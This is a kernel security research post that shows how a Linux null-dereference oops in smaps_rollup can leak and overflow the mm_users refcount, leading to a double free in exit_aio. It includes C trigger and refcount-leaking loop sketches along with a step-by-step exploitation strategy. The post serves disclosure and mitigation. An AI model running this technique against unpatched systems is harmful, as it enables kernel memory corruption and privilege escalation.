Exploiting null-dereferences in the Linux kernel
Posted by Seth Jenkins, Project Zero
For a long time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However, with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap'ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.
Kernel oops overview
At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops – instead, the kernel tries to recover as best it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead, which calls do_exit. The kernel will also publish in dmesg a "crash" log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred – however, the intention is to allow kernel bugs to be more easily detected and logged under the philosophy that a working system is much easier to debug than a dead one.
The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any of the cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were held at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated stays allocated, and so on. However, the process that generated the oops, its associated kernel stack, task struct, derivative members, and so on can and often will be freed, meaning that depending on the precise circumstances of the oops, it's possible that no memory is actually leaked. This becomes particularly important with regard to exploitation later.
Reference count mismanagement overview
Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly fails to decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important, however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 2^32 times.
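As a quick illustration of why an overflow-unsafe 32-bit counter is so dangerous – this is a userland sketch for demonstration purposes only, not kernel code – note how a plain 32-bit counter silently wraps back to zero, whereas the kernel's saturating refcount_t would instead pin at its maximum value:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
        /* A plain 32-bit counter, analogous to an overflow-unsafe atomic_t. */
        uint32_t refcount = UINT32_MAX;  /* 2^32 - 1 leaked increments so far */

        refcount++;  /* one more leak: silently wraps around to 0 */
        printf("refcount after overflow: %u\n", (unsigned)refcount);

        /*
         * At this point any "last" decrement path believes it owns the object
         * and frees it, even though live references still exist. A saturating
         * refcount_t would have stuck at its maximum instead of wrapping.
         */
        return 0;
}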
Example null-deref bug
When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let's look at an example – an otherwise unrelated bug I coincidentally discovered in the very recent past:
static int show_smaps_rollup(struct seq_file *m, void *v)
{
        struct proc_maps_private *priv = m->private;
        struct mem_size_stats mss;
        struct mm_struct *mm;
        struct vm_area_struct *vma;
        unsigned long last_vma_end = 0;
        int ret = 0;

        priv->task = get_proc_task(priv->inode); //task reference taken
        if (!priv->task)
                return -ESRCH;

        mm = priv->mm; //with no vma's, mm->mmap is NULL
        if (!mm || !mmget_not_zero(mm)) { //mm reference taken
                ret = -ESRCH;
                goto out_put_task;
        }

        memset(&mss, 0, sizeof(mss));

        ret = mmap_read_lock_killable(mm); //mmap read lock taken
        if (ret)
                goto out_put_mm;

        hold_task_mempolicy(priv);

        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {
                smap_gather_stats(vma, &mss);
                last_vma_end = vma->vm_end;
        }

        show_vma_header_prefix(m, priv->mm->mmap->vm_start,
                               last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here
        seq_pad(m, ' ');
        seq_puts(m, "[rollup]\n");

        __show_smap(m, &mss, true);

        release_task_mempolicy(priv);
        mmap_read_unlock(mm);

out_put_mm:
        mmput(mm);
out_put_task:
        put_task_struct(priv->task);
        priv->task = NULL;

        return ret;
}
This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report shows a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMAs mapped at all, the task's mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply reading /proc/[pid]/smaps_rollup on a task with no VMAs (which itself can be stably created via ptrace).
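Below is a minimal userland sketch of such a trigger. The specific munmap length (x86-64 TASK_SIZE) and the lack of error handling are illustrative assumptions rather than a copy of the original proof-of-concept, and the reading process is deliberately sacrificed, since the oops kills whichever task performs the read:

#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
        pid_t pid = fork();

        if (pid == 0) {
                /* Child: become a tracee so the fault taken on return from
                 * munmap leaves us in tracing stop rather than killing us. */
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                /* Unmap the entire userland address range (x86-64 TASK_SIZE
                 * assumed); afterwards this task's mm has no VMAs and
                 * mm->mmap is NULL. */
                munmap((void *)0, (1UL << 47) - 4096);
                _exit(0); /* never reached: our own code is gone */
        }

        /* Wait for the child to enter tracing stop with an empty mm. */
        waitpid(pid, NULL, 0);

        char path[64];
        snprintf(path, sizeof(path), "/proc/%d/smaps_rollup", pid);

        int fd = open(path, O_RDONLY);
        char buf[4096];
        /* This read oopses in show_smaps_rollup(); the kernel kills the
         * reading task, so execution never returns here. */
        read(fd, buf, sizeof(buf));
        return 0;
}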
This kernel oops means that the following events occur:
- The associated struct file will have a refcount leaked if fdget took a refcount (we'll try to make sure this doesn't happen later)
- The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
- The task struct associated with the smaps_rollup file will have a refcount leaked
- The mm_struct's mm_users refcount associated with the task will be leaked
- The mm_struct's mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)
Each of these conditions is an unintentional side-effect that leads to buggy behavior, but not all of those behaviors are useful to an attacker. The permanent locking of conditions 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t, which prevents the overflow condition. This leaves condition 4.
The mm_users refcount still uses an overflow-unsafe atomic_t, and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple of important roadblocks we need to avoid in order to repeatedly leak this refcount:
- We cannot call this syscall from the task with the empty vma list itself – in other words, we can't call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
- We must re-open the smaps_rollup file every time, because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock, which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
- If we access the mm through the same pid every time, we'll run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks, so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM.
- We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn't difficult – just don't read the file from a multi-threaded process.
Our final refcount-leaking overflow strategy is as follows (a simplified sketch of the core loop follows the list):
- Process A forks a process B
- Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won't go away (but rather will enter tracing stop)
- Process B clones another process C with CLONE_VM | CLONE_PTRACE
- Process B munmaps its entire virtual memory address space – this also unmaps process C's virtual memory address space.
- Process A forks new children D and E which will access (B|C)'s smaps_rollup file respectively
- (D|E) opens (B|C)'s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
- Process A goes back to step 5 ~2^32 times
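A heavily simplified, sequential sketch of the leaking loop (steps 5–7) is shown below. It assumes that tasks B and C sharing the victim mm have already been set up as in steps 1–4; the function name, lack of parallelism, and missing error handling are illustrative assumptions, and a real PoC would distribute this work across many worker processes:

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* pid_b and pid_c are the two tasks sharing the victim mm (steps 1-4). */
static void leak_mm_users(pid_t pid_b, pid_t pid_c)
{
        char path[2][64];

        snprintf(path[0], sizeof(path[0]), "/proc/%d/smaps_rollup", pid_b);
        snprintf(path[1], sizeof(path[1]), "/proc/%d/smaps_rollup", pid_c);

        for (uint64_t i = 0; i < (1ULL << 32); i++) {
                /* Alternate between B and C so each task_struct refcount
                 * grows half as fast as the shared mm_users refcount. */
                pid_t worker = fork();

                if (worker == 0) {
                        /* Single-threaded worker with its own fd table, so
                         * fdget does not take (and leak) a struct file
                         * reference (roadblock 4). */
                        int fd = open(path[i & 1], O_RDONLY);
                        char buf[256];

                        /* Oopses in show_smaps_rollup(): mm_users is
                         * incremented but never decremented, and this
                         * worker is killed by the kernel. */
                        read(fd, buf, sizeof(buf));
                        _exit(0); /* not reached */
                }
                waitpid(worker, NULL, 0);
        }
}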
The above strategy can be rearchitected to run in parallel (across processes, not threads, due to roadblock 4) to improve performance. On server setups that print kernel logging to a serial console, generating 2^32 kernel oopses takes over 2 years. However, on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and been set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.
Exploitation
Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:
static inline void __mmput(struct mm_struct *mm)
{
        VM_BUG_ON(atomic_read(&mm->mm_users));

        uprobe_clear_state(mm);
        exit_aio(mm);
        ksm_exit(mm);
        khugepaged_exit(mm);
        exit_mmap(mm);
        mm_put_huge_zero_page(mm);
        set_mm_exe_file(mm, NULL);
        if (!list_empty(&mm->mmlist)) {
                spin_lock(&mmlist_lock);
                list_del(&mm->mmlist);
                spin_unlock(&mmlist_lock);
        }
        if (mm->binfmt)
                module_put(mm->binfmt->module);
        lru_gen_del_mm(mm);
        mmdrop(mm);
}
Unfortunately, since 64591e8605 ("mm: protect free_pgtables with mmap_lock write lock in exit_mmap"), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm's mmap_lock is permanently readlocked many times over, any call to __mmput will manifest as a permanent deadlock inside exit_mmap.
However, before the call permanently deadlocks, it will call several other functions:
- uprobe_clear_state
- exit_aio
- ksm_exit
- khugepaged_exit
Furthermore, we can call __mmput on this mm from multiple tasks concurrently by having each of them trigger an mmget/mmput on the mm, generating abnormal race conditions. Under normal execution, it should not be possible to trigger multiple __mmput's on the same mm (much less concurrent ones), as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, every mmget/mmput pair on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.
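The shape of mmput itself makes this clear – paraphrased below from the kernel sources rather than quoted verbatim – every decrement that reaches zero takes the teardown path, so once the counter has wrapped, each mmget/mmput pair "wins" its own decrement-to-zero and runs __mmput again on the same mm:

void mmput(struct mm_struct *mm)
{
        might_sleep();

        /* After the overflow, every mmget/mmput pair decrements the count
         * back to zero, so this test passes again and again, and __mmput
         * (and therefore exit_aio) runs repeatedly – and potentially
         * concurrently – on the same mm. */
        if (atomic_dec_and_test(&mm->mm_users))
                __mmput(mm);
}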
This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:
void exit_aio(struct mm_struct *mm)
{
        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
        struct ctx_rq_wait wait;
        int i, skipped;

        if (!table)
                return;

        atomic_set(&wait.count, table->nr);
        init_completion(&wait.comp);

        skipped = 0;
        for (i = 0; i < table->nr; ++i) {
                struct kioctx *ctx =
                        rcu_dereference_protected(table->table[i], true);

                if (!ctx) {
                        skipped++;
                        continue;
                }

                ctx->mmap_size = 0;
                kill_ioctx(mm, ctx, &wait);
        }

        if (!atomic_sub_and_test(skipped, &wait.count)) {
                /* Wait until all IO for the context are done. */
                wait_for_completion(&wait.comp);
        }

        RCU_INIT_POINTER(mm->ioctx_table, NULL);
        kfree(table);
}
While the callee function kill_ioctx is written in such a way as to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called concurrently), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function but only freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio's internal context-freeing loop. Successful exploitation triggers a kernel BUG indicating that a double free has occurred.
Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant, as the memory corruption primitive has already occurred before the deadlock happens. Exploiting the resulting primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition on the reclaimed allocation. It is certainly possible, although I didn't take this all the way to a completed PoC.
Conclusion
While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is still highly beneficial for security researchers to carefully evaluate the side-effects of similarly "harmless" bugs discovered in the future and to ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.